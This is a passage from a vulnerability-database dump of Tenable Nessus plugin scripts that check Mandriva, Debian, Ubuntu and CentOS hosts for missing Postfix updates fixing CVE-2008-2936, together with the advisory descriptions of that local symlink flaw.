plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:171. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37883);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-2936\");\n script_bugtraq_id(30691);\n script_xref(name:\"MDVSA\", value:\"2008:171\");\n\n script_name(english:\"Mandriva Linux Security Advisory : postfix (MDVSA-2008:171)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer of the SUSE Security Team discovered a flaw in the\nway Postfix dereferenced symbolic links. If a local user had write\naccess to a mail spool directory without a root mailbox file, it could\nbe possible for them to append arbitrary data to files that root had\nwrite permissions to (CVE-2008-2936).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64postfix1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpostfix1\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix-pcre\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:postfix-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64postfix1-2.3.8-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif 
(rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libpostfix1-2.3.8-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"postfix-2.3.8-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"postfix-ldap-2.3.8-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"postfix-mysql-2.3.8-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"postfix-pcre-2.3.8-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"postfix-pgsql-2.3.8-1.1mdv2007.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64postfix1-2.4.5-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libpostfix1-2.4.5-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-2.4.5-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-ldap-2.4.5-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-mysql-2.4.5-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-pcre-2.4.5-2.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"postfix-pgsql-2.4.5-2.1mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64postfix1-2.5.1-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpostfix1-2.5.1-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-2.5.1-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-ldap-2.5.1-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-mysql-2.5.1-2.1mdv2008.1\", yank:\"mdv\")) 
flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-pcre-2.5.1-2.1mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"postfix-pgsql-2.5.1-2.1mdv2008.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:45:05", "description": "Sebastian Krahmer discovered that Postfix, a mail transfer agent,\nincorrectly checks the ownership of a mailbox. In some configurations,\nthis allows for appending data to arbitrary files as root.\n\nNote that only specific configurations are vulnerable; the default\nDebian installation is not affected. Only a configuration meeting the\nfollowing requirements is vulnerable :\n\n - The mail delivery style is mailbox, with the Postfix\n built-in local(8) or virtual(8) delivery agents.\n - The mail spool directory (/var/spool/mail) is\n user-writeable.\n\n - The user can create hardlinks pointing to root-owned\n symlinks located in other directories.\n\nFor a detailed treating of the issue, please refer to the upstream\nauthor's announcement.", "edition": 27, "published": "2008-08-19T00:00:00", "title": "Debian DSA-1629-2 : postfix - programming error", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-19T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:postfix"], "id": "DEBIAN_DSA-1629.NASL", "href": "https://www.tenable.com/plugins/nessus/33934", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1629. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33934);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-2936\");\n script_bugtraq_id(30691);\n script_xref(name:\"DSA\", value:\"1629\");\n\n script_name(english:\"Debian DSA-1629-2 : postfix - programming error\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer discovered that Postfix, a mail transfer agent,\nincorrectly checks the ownership of a mailbox. In some configurations,\nthis allows for appending data to arbitrary files as root.\n\nNote that only specific configurations are vulnerable; the default\nDebian installation is not affected. 
Only a configuration meeting the\nfollowing requirements is vulnerable :\n\n - The mail delivery style is mailbox, with the Postfix\n built-in local(8) or virtual(8) delivery agents.\n - The mail spool directory (/var/spool/mail) is\n user-writeable.\n\n - The user can create hardlinks pointing to root-owned\n symlinks located in other directories.\n\nFor a detailed treating of the issue, please refer to the upstream\nauthor's announcement.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://article.gmane.org/gmane.mail.postfix.announce/110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1629\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the postfix package.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.3.8-2+etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned 
by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"postfix\", reference:\"2.3.8-2+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postfix-cdb\", reference:\"2.3.8-2+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postfix-dev\", reference:\"2.3.8-2+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postfix-doc\", reference:\"2.3.8-2+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postfix-ldap\", reference:\"2.3.8-2+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postfix-mysql\", reference:\"2.3.8-2+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postfix-pcre\", reference:\"2.3.8-2+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postfix-pgsql\", reference:\"2.3.8-2+etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:44:14", "description": "Sebastian Krahmer discovered that Postfix was not correctly handling\nmailbox ownership when dealing with Linux's implementation of\nhardlinking to symlinks. In certain mail spool configurations, a local\nattacker could exploit this to append data to arbitrary files as the\nroot user. 
The default Ubuntu configuration was not vulnerable.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2008-08-20T00:00:00", "title": "Ubuntu 6.06 LTS / 7.04 / 7.10 / 8.04 LTS : postfix vulnerability (USN-636-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-20T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:7.10", "p-cpe:/a:canonical:ubuntu_linux:postfix-ldap", "p-cpe:/a:canonical:ubuntu_linux:postfix-pcre", "p-cpe:/a:canonical:ubuntu_linux:postfix-dev", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:postfix-mysql", "p-cpe:/a:canonical:ubuntu_linux:postfix-cdb", "cpe:/o:canonical:ubuntu_linux:7.04", "p-cpe:/a:canonical:ubuntu_linux:postfix-doc", "p-cpe:/a:canonical:ubuntu_linux:postfix", "p-cpe:/a:canonical:ubuntu_linux:postfix-pgsql", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-636-1.NASL", "href": "https://www.tenable.com/plugins/nessus/33941", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-636-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33941);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-2936\");\n script_bugtraq_id(30691);\n script_xref(name:\"USN\", value:\"636-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 7.04 / 7.10 / 8.04 LTS : postfix vulnerability (USN-636-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer discovered that Postfix was not correctly handling\nmailbox ownership when dealing with Linux's implementation of\nhardlinking to symlinks. In certain mail spool configurations, a local\nattacker could exploit this to append data to arbitrary files as the\nroot user. The default Ubuntu configuration was not vulnerable.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/636-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-cdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-pcre\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postfix-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2021 Canonical, Inc. / NASL script (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|7\\.04|7\\.10|8\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 7.04 / 7.10 / 8.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postfix\", pkgver:\"2.2.10-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postfix-dev\", pkgver:\"2.2.10-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postfix-doc\", pkgver:\"2.2.10-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postfix-ldap\", pkgver:\"2.2.10-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postfix-mysql\", pkgver:\"2.2.10-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postfix-pcre\", pkgver:\"2.2.10-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postfix-pgsql\", pkgver:\"2.2.10-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix-cdb\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix-dev\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix-doc\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix-ldap\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix-mysql\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix-pcre\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"postfix-pgsql\", pkgver:\"2.3.8-2ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-cdb\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-dev\", 
pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-doc\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-ldap\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-mysql\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-pcre\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"postfix-pgsql\", pkgver:\"2.4.5-3ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-cdb\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-dev\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-doc\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-ldap\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-mysql\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-pcre\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postfix-pgsql\", pkgver:\"2.5.1-2ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix / postfix-cdb / postfix-dev / postfix-doc / postfix-ldap / etc\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:25:24", "description": "Updated postfix packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response 
Team.\n\nPostfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH\n(SASL), and TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. (CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly\ndisclosing this issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.", "edition": 26, "published": "2008-08-15T00:00:00", "title": "CentOS 3 / 4 / 5 : postfix (CESA-2008:0839)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-15T00:00:00", "cpe": ["cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:postfix", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:postfix-pflogsumm", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2008-0839.NASL", "href": "https://www.tenable.com/plugins/nessus/33890", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0839 and \n# CentOS Errata and Security Advisory 2008:0839 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33890);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-2936\");\n script_bugtraq_id(30691);\n script_xref(name:\"RHSA\", value:\"2008:0839\");\n\n script_name(english:\"CentOS 3 / 4 / 5 : postfix (CESA-2008:0839)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"Updated postfix packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH\n(SASL), and TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. (CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly\ndisclosing this issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-August/015185.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0e846042\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-August/015186.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0f99e39b\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-August/015187.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?040893ac\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-August/015188.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?049939bc\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-August/015197.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?794c4583\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-August/015199.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b71a314a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix 
packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postfix-pflogsumm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. 
